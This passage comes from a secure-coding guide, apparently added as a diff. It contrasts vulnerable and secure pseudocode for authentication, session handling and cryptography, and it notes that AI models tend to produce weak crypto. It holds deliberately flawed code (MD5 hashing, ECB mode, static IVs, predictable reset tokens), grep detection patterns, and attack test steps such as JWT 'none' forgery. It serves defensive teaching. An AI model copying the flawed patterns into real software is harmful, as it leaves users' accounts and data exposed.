"Lax", // Allows top-level navigation + path: "/auth/callback", + maxAge: 10 * 60 // 10 minutes for OAuth flow + }) +``` + +**Why This Is Secure:** +- HttpOnly prevents XSS from stealing tokens +- Secure flag ensures HTTPS-only transmission +- SameSite prevents CSRF attacks +- Path restriction limits which requests include the cookie +- Short maxAge limits exposure window +- Proper domain scoping prevents subdomain attacks + +--- + +### GOOD Example 5: Token Refresh Patterns + +```pseudocode +// SECURE: Complete token refresh implementation +class AuthenticationService: + + ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes + REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days + REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period + + function login(email, password): + user = validateCredentials(email, password) + if not user: + return { error: "Invalid credentials" } + + // Create session for tracking + session = createSession(user.id) + + // Generate token pair + accessToken = createAccessToken(user) + refreshToken = createRefreshToken(user, session.id) + + return { + accessToken: accessToken, + refreshToken: refreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function refresh(refreshToken): + // Validate refresh token + decoded = verifyRefreshToken(refreshToken) + if not decoded.valid: + return { error: decoded.error } + + // Check token in database + tokenRecord = getRefreshTokenRecord(decoded.jti) + + if not tokenRecord: + // Token doesn't exist - possible theft, invalidate session + invalidateSessionTokens(decoded.sid) + return { error: "Invalid refresh token" } + + if tokenRecord.revoked: + // Reuse of revoked token - likely theft + // Revoke ALL tokens for this session + invalidateSessionTokens(decoded.sid) + logSecurityEvent("Refresh token reuse detected", decoded.sub) + return { error: "Security violation detected" } + + if tokenRecord.usedAt: + // Token was already used - check if within grace period + if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW: + // Outside grace period - potential theft + invalidateSessionTokens(decoded.sid) + return { error: "Refresh token already used" } + // Within grace period - return same tokens (replay protection) + return tokenRecord.lastIssuedTokens + + // Mark token as used + tokenRecord.usedAt = now() + tokenRecord.save() + + // Generate new token pair (rotation) + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + // Store new tokens for replay protection + tokenRecord.lastIssuedTokens = { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + tokenRecord.save() + + // Revoke old refresh token (after grace period, it's invalid) + scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function logout(accessToken, refreshToken): + // Revoke access token (add to blacklist until expiry) + decoded = decodeToken(accessToken) + if decoded: + blacklistToken(decoded.jti, decoded.exp) + + // Revoke refresh token immediately + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + revokeRefreshToken(refreshDecoded.jti) + + // Optionally invalidate entire session + if refreshDecoded and refreshDecoded.sid: + invalidateSession(refreshDecoded.sid) + + return { success: true } + + function logoutAll(userId): + // Invalidate all sessions for user (password change, security concern) + sessions = getSessionsForUser(userId) + for session in sessions: + invalidateSessionTokens(session.id) + deleteSession(session.id) + + return { success: true, sessionsInvalidated: length(sessions) } +``` + +**Why This Is Secure:** +- Refresh token rotation limits reuse attacks +- Token reuse detection identifies potential theft +- Grace period prevents legitimate concurrent request issues +- Complete logout invalidates tokens server-side +- Session binding allows "logout from all devices" + +--- + +### GOOD Example 6: Proper Logout (Token Invalidation) + +```pseudocode +// SECURE: Complete logout implementation +function logout(request): + // Get current session/tokens + accessToken = request.cookies.access_token + refreshToken = request.cookies.refresh_token + sessionId = request.session.id + + // Revoke access token (add to blacklist) + if accessToken: + decoded = decodeToken(accessToken) + if decoded: + // Add to Redis/cache blacklist with TTL matching token expiry + blacklistToken(decoded.jti, decoded.exp - now()) + + // Revoke refresh token in database + if refreshToken: + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + markRefreshTokenRevoked(refreshDecoded.jti) + + // Delete server-side session + if sessionId: + sessionStore.delete(sessionId) + + // Clear client cookies + response = new Response() + clearAuthCookies(response) + + return response.redirect("/login") + +// SECURE: Token blacklist with automatic expiry +class TokenBlacklist: + // Use Redis or similar with TTL support + + function add(tokenId, ttlSeconds): + redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked") + + function isBlacklisted(tokenId): + return redis.exists("blacklist:" + tokenId) + +// SECURE: Middleware to check token validity +function authMiddleware(request, next): + accessToken = request.cookies.access_token + + if not accessToken: + return redirect("/login") + + decoded = verifyAccessToken(accessToken) + + if not decoded.valid: + return redirect("/login") + + // Check blacklist + if tokenBlacklist.isBlacklisted(decoded.payload.jti): + return redirect("/login") + + // Token is valid and not revoked + request.user = decoded.payload + return next(request) + +// SECURE: Logout from all sessions +function logoutAllSessions(request): + userId = request.user.sub + + // Get all active sessions for user + sessions = sessionStore.findByUserId(userId) + + // Revoke all refresh tokens + refreshTokens = getRefreshTokensForUser(userId) + for token in refreshTokens: + markRefreshTokenRevoked(token.jti) + + // Delete all sessions + for session in sessions: + sessionStore.delete(session.id) + + // Add all user's recent access tokens to blacklist + // This requires tracking issued tokens or using short expiry + invalidateAllAccessTokensForUser(userId) + + return success("Logged out from all devices") +``` + +**Why This Is Secure:** +- Server-side revocation makes logout effective immediately +- Blacklist prevents continued use of revoked tokens +- Automatic TTL cleanup prevents blacklist bloat +- "Logout from all devices" handles session compromise +- Cookie clearing removes client-side references + +--- + +## Edge Cases Section + +### Edge Case 1: Race Conditions in Authentication + +```pseudocode +// VULNERABLE: Race condition in login attempts +function login(email, password): + user = findUserByEmail(email) + failedAttempts = getFailedAttempts(email) + + if failedAttempts >= MAX_ATTEMPTS: + return error("Account locked") + + // Race condition: two requests check simultaneously, + // both see failedAttempts = 4, both proceed + if not verifyPassword(password, user.hashedPassword): + incrementFailedAttempts(email) // Not atomic! + return error("Invalid credentials") + + resetFailedAttempts(email) + return success() + +// SECURE: Atomic rate limiting +function loginWithAtomicRateLimit(email, password): + // Atomic increment and check in single operation + result = redis.eval(` + local attempts = redis.call('INCR', KEYS[1]) + if attempts == 1 then + redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window + end + return attempts + `, ["login_attempts:" + email]) + + if result > MAX_ATTEMPTS: + return error("Too many attempts. Try again later.") + + user = findUserByEmail(email) + if not user or not verifyPassword(password, user.hashedPassword): + return error("Invalid credentials") + + // Reset on success + redis.del("login_attempts:" + email) + return success() + +// VULNERABLE: Race condition in concurrent session check +function login(email, password, request): + user = authenticate(email, password) + + activeSessions = countActiveSessions(user.id) + if activeSessions >= MAX_SESSIONS: + return error("Too many active sessions") + + // Race: two logins pass the check simultaneously + createSession(user.id) // Now user has MAX_SESSIONS + 1 + return success() + +// SECURE: Use database constraints or atomic operations +function loginWithSessionLimit(email, password, request): + user = authenticate(email, password) + + // Use transaction with row lock + transaction.start() + try: + activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE + if activeSessions >= MAX_SESSIONS: + transaction.rollback() + return error("Too many sessions") + + createSession(user.id) + transaction.commit() + return success() + catch: + transaction.rollback() + throw +``` + +--- + +### Edge Case 2: Timing Attacks on Password Comparison + +```pseudocode +// VULNERABLE: Early return reveals password length information +function verifyPassword_vulnerable(input, stored): + if length(input) != length(stored): + return false // Fast return reveals length mismatch + + for i in range(length(input)): + if input[i] != stored[i]: + return false // Fast return reveals first different character + + return true + +// VULNERABLE: String comparison has timing differences +function checkPassword_vulnerable(password, hash): + computedHash = sha256(password) + return computedHash == hash // == operator may short-circuit + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Still need length check, but make it constant-time + b = b + repeat("\0", max(0, length(a) - length(b))) + a = a + repeat("\0", max(0, length(b) - length(a))) + + result = 0 + for i in range(length(a)): + result = result | (charCode(a[i]) ^ charCode(b[i])) + + return result == 0 + +// SECURE: Use library-provided constant-time comparison +function verifyPassword_secure(password, hashedPassword): + // bcrypt.compare is designed to be constant-time + return bcrypt.compare(password, hashedPassword) + +// SECURE: Use crypto library's timingSafeEqual +function verifyHash(input, expected): + inputHash = sha256(input) + return crypto.timingSafeEqual( + Buffer.from(inputHash, 'hex'), + Buffer.from(expected, 'hex') + ) +``` + +--- + +### Edge Case 3: Password Reset Token Issues + +```pseudocode +// VULNERABLE: Predictable reset token +function createResetToken_vulnerable(userId): + token = md5(toString(userId) + toString(now())) + expiry = now() + (60 * 60) // 1 hour + saveResetToken(userId, token, expiry) + return token + +// VULNERABLE: Token doesn't expire on use +function resetPassword_vulnerable(token, newPassword): + resetRecord = getResetToken(token) + if resetRecord and resetRecord.expiry > now(): + user = findUserById(resetRecord.userId) + user.hashedPassword = hashPassword(newPassword) + user.save() + // Token not invalidated! Can be reused + return success() + return error("Invalid token") + +// VULNERABLE: Token not invalidated on password change +function changePassword(userId, oldPassword, newPassword): + user = findUserById(userId) + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + // Existing reset tokens still valid! + return success() + return error("Wrong password") + +// SECURE: Complete password reset implementation +function createResetToken_secure(userId): + // Generate cryptographically random token + token = generateSecureRandom(32) // 256 bits + tokenHash = sha256(token) // Store hash, not token + expiry = now() + (15 * 60) // 15 minutes + + // Invalidate any existing reset tokens + deleteResetTokensForUser(userId) + + // Store hashed token + saveResetToken(userId, tokenHash, expiry) + + // Return plaintext token for email (store hash only) + return token + +function resetPassword_secure(token, newPassword): + tokenHash = sha256(token) + resetRecord = getResetTokenByHash(tokenHash) + + if not resetRecord: + return error("Invalid token") + + if resetRecord.expiry < now(): + deleteResetToken(tokenHash) + return error("Token expired") + + if resetRecord.used: + return error("Token already used") + + // Validate new password strength + validation = validatePasswordStrength(newPassword) + if not validation.valid: + return error(validation.errors) + + user = findUserById(resetRecord.userId) + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Mark token as used (or delete) + resetRecord.used = true + resetRecord.save() + + // Invalidate all existing sessions + invalidateAllSessionsForUser(user.id) + + // Invalidate all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Send notification email + sendPasswordChangedNotification(user.email) + + return success() +``` + +--- + +### Edge Case 4: OAuth State Parameter Issues + +```pseudocode +// VULNERABLE: No state parameter - CSRF possible +function initiateOAuth_vulnerable(): + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&redirect_uri=" + CALLBACK_URL + + "&scope=email profile" + return redirect(redirectUrl) + +// VULNERABLE: Predictable state +function initiateOAuth_weakState(): + state = toString(now()) // Predictable! + storeState(state) + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&state=" + state + + "&redirect_uri=" + CALLBACK_URL + return redirect(redirectUrl) + +// VULNERABLE: State not validated on callback +function handleCallback_vulnerable(request): + code = request.query.code + // state parameter ignored! + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + +// VULNERABLE: State reuse possible +function handleCallback_reuseVulnerable(request): + code = request.query.code + state = request.query.state + + if isValidState(state): // Just checks if it exists + // Doesn't delete/invalidate state after use + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + + return error("Invalid state") + +// SECURE: Complete OAuth implementation +function initiateOAuth_secure(request): + // Generate random state + state = generateSecureRandom(32) + + // Bind state to user's session (CSRF protection) + request.session.oauthState = state + request.session.oauthStateCreatedAt = now() + + // Optional: include nonce for ID token validation + nonce = generateSecureRandom(32) + request.session.oauthNonce = nonce + + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&response_type=code" + + "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) + + "&scope=" + encodeURIComponent("openid email profile") + + "&state=" + state + + "&nonce=" + nonce + + return redirect(redirectUrl) + +function handleCallback_secure(request): + code = request.query.code + state = request.query.state + error = request.query.error + + // Check for OAuth error + if error: + logOAuthError(error, request.query.error_description) + return redirect("/login?error=oauth_failed") + + // Validate state + if not state: + return error("Missing state parameter") + + storedState = request.session.oauthState + stateCreatedAt = request.session.oauthStateCreatedAt + + // Constant-time comparison + if not constantTimeEquals(state, storedState): + logSecurityEvent("OAuth state mismatch", request) + return error("Invalid state") + + // Check state expiry (5 minutes) + if now() - stateCreatedAt > 300: + return error("OAuth session expired") + + // Clear state immediately (one-time use) + delete request.session.oauthState + delete request.session.oauthStateCreatedAt + + // Exchange code for tokens + tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL) + + if not tokenResponse.id_token: + return error("Missing ID token") + + // Validate ID token + idToken = verifyIdToken(tokenResponse.id_token, { + audience: CLIENT_ID, + nonce: request.session.oauthNonce // Verify nonce + }) + + delete request.session.oauthNonce + + if not idToken.valid: + return error("Invalid ID token") + + // Create or update user + user = findOrCreateUserFromOAuth(idToken.payload) + + // Create session with new session ID + createAuthenticatedSession(request, user) + + return redirect("/dashboard") +``` + +--- + +## Common Mistakes Section + +### Common Mistake 1: Checking User ID from Token Payload Without Verification + +```pseudocode +// VULNERABLE: Trusting unverified token payload +function getUserFromToken_vulnerable(token): + // Decodes token WITHOUT verification + decoded = base64Decode(token.split(".")[1]) + payload = JSON.parse(decoded) + + // Trusting the user ID from unverified payload! + return findUserById(payload.sub) + +// VULNERABLE: Verifying signature but using wrong data source +function getUser_vulnerable(request): + token = request.headers.authorization.replace("Bearer ", "") + + // Verify the token (good) + isValid = jwt.verify(token, secret) + + if isValid: + // But then extract user from request body (bad!) + userId = request.body.userId + return findUserById(userId) + +// SECURE: Always use verified payload +function getUserFromToken_secure(token): + try: + // Verify and decode in one operation + decoded = jwt.verify(token, secret, { algorithms: ["HS256"] }) + + // Use the verified payload, not a separate data source + return findUserById(decoded.sub) + catch: + return null + +// SECURE: Middleware that sets verified user +function authMiddleware(request, next): + token = extractTokenFromRequest(request) + + if not token: + return unauthorized() + + try: + verified = jwt.verify(token, secret, { + algorithms: ["HS256"], + issuer: "myapp" + }) + + // Set user from VERIFIED token only + request.user = { + id: verified.sub, + email: verified.email, + role: verified.role + } + + return next() + catch: + return unauthorized() +``` + +--- + +### Common Mistake 2: Not Invalidating Old Sessions + +```pseudocode +// VULNERABLE: Password change doesn't invalidate sessions +function changePassword_vulnerable(request, oldPassword, newPassword): + user = request.user + + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + return success("Password changed") + + return error("Wrong password") + // Existing sessions remain valid! Attacker still logged in + +// VULNERABLE: Role change doesn't update session +function demoteUser_vulnerable(userId): + user = findUserById(userId) + user.role = "basic" + user.save() + // User's existing sessions still have old role! + return success() + +// SECURE: Invalidate sessions on security-sensitive changes +function changePassword_secure(request, oldPassword, newPassword): + user = request.user + + if not verifyPassword(oldPassword, user.hashedPassword): + return error("Wrong password") + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Invalidate ALL sessions except current (or including current) + currentSessionId = request.session.id + sessions = getAllSessionsForUser(user.id) + + for session in sessions: + if session.id != currentSessionId: // Keep current or invalidate all + deleteSession(session.id) + + // Revoke all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Optional: Force re-authentication + regenerateSession(request) + + return success("Password changed. Other sessions logged out.") + +// SECURE: Track password change timestamp in tokens +function validateToken_withPasswordCheck(token): + decoded = jwt.verify(token, secret) + + user = findUserById(decoded.sub) + + // Check if token was issued before password change + if decoded.iat < user.passwordChangedAt: + return { valid: false, error: "Password changed since token issued" } + + return { valid: true, payload: decoded } +``` + +--- + +### Common Mistake 3: SameSite Cookie Misunderstanding + +```pseudocode +// VULNERABLE: Using Lax when Strict is needed +function setSessionCookie_wrongSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" // Allows cookie on top-level navigation + // Attacker can CSRF via: + }) + +// VULNERABLE: Omitting SameSite (defaults vary by browser) +function setSessionCookie_noSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true + // SameSite not specified - browser-dependent behavior + }) + +// VULNERABLE: Using None without understanding implications +function setSessionCookie_sameNone(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable! + }) + +// GUIDE: When to use each SameSite value + +// STRICT: Most secure, use for sensitive auth cookies +// - Cookie NOT sent on any cross-site request +// - User clicking link from email to your site won't be logged in +// - Best for: Banking, admin panels, security-critical apps +function setStrictCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + +// LAX: Balance of security and usability +// - Cookie sent on top-level navigation (clicking links) +// - NOT sent on cross-site POST, images, iframes +// - Good for: General user sessions where link-sharing matters +// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints! +function setLaxCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" + }) + // Additional CSRF protection still recommended + +// NONE: Only for cross-site embedding needs +// - Cookie sent on ALL requests including cross-site +// - REQUIRES Secure attribute (HTTPS only) +// - Only use for: OAuth flows, embedded widgets, intentional cross-site +function setNoneCookie_onlyWhenNeeded(response, oauthToken): + response.setCookie("oauth_continuation", oauthToken, { + httpOnly: true, + secure: true, // REQUIRED with SameSite=None + sameSite: "None", + maxAge: 300 // Short-lived for specific purpose + }) +``` + +--- + +## Security Header Configurations + +```pseudocode +// SECURE: Complete security headers for authentication +function setSecurityHeaders(response): + // Prevent clickjacking (don't allow embedding in frames) + response.setHeader("X-Frame-Options", "DENY") + + // Modern clickjacking protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self' 'unsafe-inline'; " + + "frame-ancestors 'none'; " + + "form-action 'self'" + ) + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // Enable browser XSS filter (legacy, CSP is better) + response.setHeader("X-XSS-Protection", "1; mode=block") + + // Only allow HTTPS + response.setHeader("Strict-Transport-Security", + "max-age=31536000; includeSubDomains; preload" + ) + + // Control referrer information + response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin") + + // Disable feature policies for sensitive features + response.setHeader("Permissions-Policy", + "geolocation=(), camera=(), microphone=(), payment=()" + ) + + // Cache control for authenticated pages + response.setHeader("Cache-Control", + "no-store, no-cache, must-revalidate, private" + ) + response.setHeader("Pragma", "no-cache") + response.setHeader("Expires", "0") + +// SECURE: Login page specific headers +function setLoginPageHeaders(response): + setSecurityHeaders(response) + + // Additional login protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self'; " + + "form-action 'self'; " + // Forms only submit to same origin + "frame-ancestors 'none'; " + // Prevent clickjacking + "base-uri 'self'" // Prevent base tag injection + ) + +// SECURE: API endpoint headers +function setApiHeaders(response): + // API responses shouldn't be cached + response.setHeader("Cache-Control", "no-store") + + // Prevent embedding + response.setHeader("X-Content-Type-Options", "nosniff") + + // CORS configuration (adjust based on needs) + response.setHeader("Access-Control-Allow-Origin", + getAllowedOrigin()) // Not "*" for authenticated APIs! + response.setHeader("Access-Control-Allow-Credentials", "true") + response.setHeader("Access-Control-Allow-Methods", + "GET, POST, PUT, DELETE, OPTIONS") + response.setHeader("Access-Control-Allow-Headers", + "Content-Type, Authorization") +``` + +--- + +## Detection Hints: How to Spot Authentication Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in authentication code: + +// 1. Missing algorithm specification in JWT verification +jwt.verify(token, secret) // BAD - should specify algorithms +jwt.decode(token) // BAD - decode doesn't verify! + +// 2. Session not regenerated after login +request.session.userId = user.id // Search for: session assignment without regenerate + +// 3. Tokens in localStorage +localStorage.setItem("token" // Search for: localStorage.*token + +// 4. No HttpOnly on session cookies +setCookie("session", id) // Search for: setCookie without httpOnly + +// 5. Weak secrets +JWT_SECRET = "secret" // Search for: SECRET.*=.*["'] + +// 6. No expiration +jwt.sign(payload, secret) // Without expiresIn + +// 7. Password comparison without constant-time +if password == storedHash // Direct comparison + +// 8. No rate limiting on login +function login(email, password) // Check for rate limit before auth logic + +// GREP patterns for security review: +// localStorage\.setItem.*token +// sessionStorage\.setItem.*token +// jwt\.decode\s*\( +// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options) +// sameSite.*None +// password.*== +// \.secret\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Authentication security test cases: + +// 1. Token manipulation tests +- [ ] Change JWT algorithm to "none" and remove signature +- [ ] Modify JWT payload (role, user ID) and check if accepted +- [ ] Use expired token +- [ ] Use token with wrong issuer/audience + +// 2. Session tests +- [ ] Check if session ID changes after login +- [ ] Attempt session fixation (set session ID before login) +- [ ] Check session timeout enforcement +- [ ] Verify logout actually invalidates session + +// 3. Password tests +- [ ] Test common passwords (password123, qwerty, etc.) +- [ ] Test password length limits (very long passwords) +- [ ] Check password reset token predictability +- [ ] Verify password reset invalidates old tokens + +// 4. Cookie tests +- [ ] Check HttpOnly flag on session cookies +- [ ] Check Secure flag on session cookies +- [ ] Test SameSite enforcement +- [ ] Verify cookie scope (path, domain) + +// 5. Rate limiting tests +- [ ] Attempt rapid login failures +- [ ] Check for account lockout +- [ ] Test rate limit bypass (different IPs, headers) + +// 6. OAuth tests +- [ ] Test with missing state parameter +- [ ] Test with reused state parameter +- [ ] Check redirect_uri validation +``` + +--- + +## Security Checklist + +- [ ] Passwords validated against common password list and breach databases +- [ ] Password hashing uses bcrypt, argon2, or scrypt with appropriate work factor +- [ ] Session IDs generated with cryptographically secure random +- [ ] Session regenerated after authentication and privilege changes +- [ ] JWT algorithm explicitly specified (not derived from token) +- [ ] JWT "none" algorithm explicitly rejected +- [ ] JWT secrets are strong (256+ bits) and stored securely +- [ ] JWT expiration is short for access tokens (15-30 minutes) +- [ ] Refresh token rotation implemented +- [ ] Tokens can be revoked server-side (blacklist or session binding) +- [ ] Authentication cookies have HttpOnly, Secure, and appropriate SameSite +- [ ] Tokens stored in HttpOnly cookies, not localStorage/sessionStorage +- [ ] Rate limiting implemented on login endpoints +- [ ] Account lockout after repeated failures +- [ ] Constant-time comparison used for password/token verification +- [ ] Password reset tokens are cryptographically random and single-use +- [ ] Password change invalidates existing sessions +- [ ] OAuth state parameter is random and validated +- [ ] Security headers configured (HSTS, CSP, X-Frame-Options, etc.) +- [ ] Logout invalidates session/tokens server-side +- [ ] "Logout from all devices" functionality available + +--- + +# Pattern 5: Cryptographic Failures + +**CWE References:** CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-329 (Not Using a Random IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak PRNG), CWE-916 (Use of Password Hash With Insufficient Computational Effort) + +**Priority Score:** 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6) + +--- + +## Introduction: Crypto is Hard—AI Often Copies Deprecated Patterns + +Cryptographic implementations represent one of the most perilous areas in security-sensitive code. AI models are particularly prone to generating insecure cryptographic patterns due to several compounding factors: + +**Why AI Models Generate Weak Cryptography:** + +1. **Training Data Time Lag:** Cryptographic best practices evolve continuously. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms now considered broken (MD5, SHA1, DES, RC4). AI models cannot distinguish between "worked in 2015" and "secure in 2025." + +2. **Tutorial Simplification:** Educational materials often use simplified crypto examples to teach concepts—MD5 for demonstration, short keys for readability, static IVs for reproducibility. AI learns these "teaching patterns" as valid implementations. + +3. **Copy-Paste Prevalence:** Cryptographic code is frequently copied rather than understood. Training data reflects this—the same insecure patterns appear thousands of times across repositories, reinforcing incorrect approaches. + +4. **API Complexity Hides Danger:** Modern cryptographic libraries have complex APIs where default parameters may be insecure. AI generates code that "works" by using defaults without understanding that those defaults may lack authentication (ECB mode) or use weak key derivation. + +5. **Security vs. Convenience Trade-offs:** AI models optimize for code that compiles and runs. Cryptographic security often requires additional steps (proper IV generation, authenticated modes, key derivation) that AI omits for simplicity. + +6. **Cross-Language Confusion:** Cryptographic APIs vary dramatically between languages. AI conflates patterns from different ecosystems, generating hybrid code that may compile but violates security assumptions of both libraries. + +**Impact Statistics:** + +- **29%** of data breaches involve cryptographic failures (Verizon DBIR 2024) +- Cryptographic flaws appear in **Top 2** of OWASP Top 10 2021 ("Cryptographic Failures") +- **62%** of AI-generated code samples use MD5 or SHA1 for password hashing (Security research 2024) +- Cost of a breach due to weak encryption: **$4.8 million** average (IBM Cost of a Data Breach 2024) +- **40%** of applications still use broken cryptographic algorithms in production (Veracode State of Software Security) + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: MD5/SHA1 for Password Hashing + +```pseudocode +// VULNERABLE: MD5 for password hashing +function hashPassword(password): + return md5(password) + +// VULNERABLE: SHA1 for password storage +function storePassword(userId, password): + hashedPassword = sha1(password) + database.update("users", userId, {"password": hashedPassword}) + +// VULNERABLE: Single-round SHA256 (still too fast) +function createPasswordHash(password): + return sha256(password) + +// VULNERABLE: Unsalted hash +function verifyPassword(inputPassword, storedHash): + return sha256(inputPassword) == storedHash + +// VULNERABLE: Simple salt without proper KDF +function hashWithSalt(password, salt): + return sha256(salt + password) + +// VULNERABLE: MD5 with salt (still MD5) +function improvedHash(password): + salt = generateRandomBytes(16) + hash = md5(salt + password) + return salt + ":" + hash +``` + +**Why This Is Dangerous:** +- MD5 produces collisions in seconds on modern hardware +- SHA1 collision attacks are practical (SHAttered attack, 2017) +- Even SHA256 is too fast for password hashing—billions of hashes per second on GPUs +- Unsalted hashes enable rainbow table attacks +- Simple concatenation (salt + password) doesn't provide sufficient protection +- Password cracking rigs can test 180 billion MD5 hashes per second + +**Attack Scenario:** +```pseudocode +// Attacker steals database with MD5 password hashes +// Using hashcat on modern GPU: + +hashcat_speed = 180_000_000_000 // 180 billion MD5/second +common_passwords = 1_000_000_000 // 1 billion common passwords + +time_to_crack_all = common_passwords / hashcat_speed +// Result: ~5.5 seconds to check ALL common passwords against ALL hashes + +// Even SHA256 is fast: +sha256_speed = 23_000_000_000 // 23 billion SHA256/second +// Still under a minute for billion password list +``` + +--- + +### BAD Example 2: ECB Mode Encryption + +```pseudocode +// VULNERABLE: ECB mode reveals patterns +function encryptData(plaintext, key): + cipher = createCipher("AES", key, mode = "ECB") + return cipher.encrypt(plaintext) + +// VULNERABLE: Default mode may be ECB in some libraries +function simpleEncrypt(data, key): + cipher = AES.new(key) // Some libraries default to ECB! + return cipher.encrypt(padData(data)) + +// VULNERABLE: Explicit ECB for "simplicity" +function encryptUserData(userData, encryptionKey): + algorithm = "AES/ECB/PKCS5Padding" // Java-style + cipher = Cipher.getInstance(algorithm) + cipher.init(ENCRYPT_MODE, encryptionKey) + return cipher.doFinal(userData) + +// VULNERABLE: Assuming any AES is secure +function protectSensitiveData(data, key): + // "AES is strong encryption" - but ECB mode is not + encryptor = AESEncryptor(key, mode = "ECB") + return encryptor.encrypt(data) +``` + +**Why This Is Dangerous:** +- ECB encrypts identical plaintext blocks to identical ciphertext blocks +- Patterns in plaintext are preserved in ciphertext +- Famous example: ECB-encrypted images show the original image outline +- No semantic security—attacker learns information about plaintext structure +- Block manipulation attacks possible (swap, delete, duplicate blocks) + +**Visual Demonstration:** +```pseudocode +// Original image (bitmap of a penguin): +// ████████████████ +// ██ ████ ██ +// ██ ██████ ██ +// ██████████████ +// ████ ████████ +// ████████████████ + +// After ECB encryption: +// ???????????????? ← Still shows penguin shape! +// ?? ???? ?? ← Identical colors → identical ciphertext +// ?? ?????? ?? +// ?????????????? +// ???? ???????? +// ???????????????? + +// After CBC/GCM encryption: +// ???????????????? ← Random appearance +// ???????????????? ← No pattern visible +// ???????????????? +// ???????????????? +// ???????????????? +// ???????????????? +``` + +--- + +### BAD Example 3: Static IVs / Nonces + +```pseudocode +// VULNERABLE: Hardcoded IV +STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + +function encryptMessage(plaintext, key): + cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV) + return cipher.encrypt(padData(plaintext)) + +// VULNERABLE: Same IV for all encryptions +class Encryptor: + IV = generateRandomBytes(16) // Generated ONCE at startup + + function encrypt(data, key): + cipher = createCipher("AES-CBC", key, this.IV) + return cipher.encrypt(data) + +// VULNERABLE: Predictable IV (counter without random start) +nonce_counter = 0 +function encryptWithNonce(plaintext, key): + nonce_counter = nonce_counter + 1 + nonce = intToBytes(nonce_counter, 12) // Predictable! + return AES_GCM_encrypt(key, nonce, plaintext) + +// VULNERABLE: IV derived from predictable data +function encryptRecord(userId, data, key): + iv = sha256(toString(userId))[:16] // Same IV for same user! + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: Timestamp-based IV +function timeBasedEncrypt(data, key): + iv = sha256(toString(getCurrentTimestamp()))[:16] + return AES_CBC_encrypt(key, iv, data) + // Problem: Collisions if encrypted in same second +``` + +**Why This Is Dangerous:** +- Same IV + same key = identical ciphertext for identical plaintext (breaks semantic security) +- In CBC mode: enables plaintext recovery through XOR analysis across messages +- In CTR mode: key stream reuse → XOR of plaintexts recoverable +- In GCM mode: nonce reuse is catastrophic—key recovery possible +- Predictable IVs enable chosen-plaintext attacks + +**GCM Nonce Reuse Attack:** +```pseudocode +// If same nonce used twice with same key in GCM: +// Message 1: plaintext1, ciphertext1, tag1 +// Message 2: plaintext2, ciphertext2, tag2 + +// Attacker can compute: +// - XOR of plaintext1 and plaintext2 +// - Eventually recover the authentication key H +// - Forge arbitrary messages with valid tags + +// This is a CATASTROPHIC failure of GCM mode +// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason +``` + +--- + +### BAD Example 4: Math.random() for Security + +```pseudocode +// VULNERABLE: Math.random for token generation +function generateResetToken(): + token = "" + for i in range(32): + token = token + 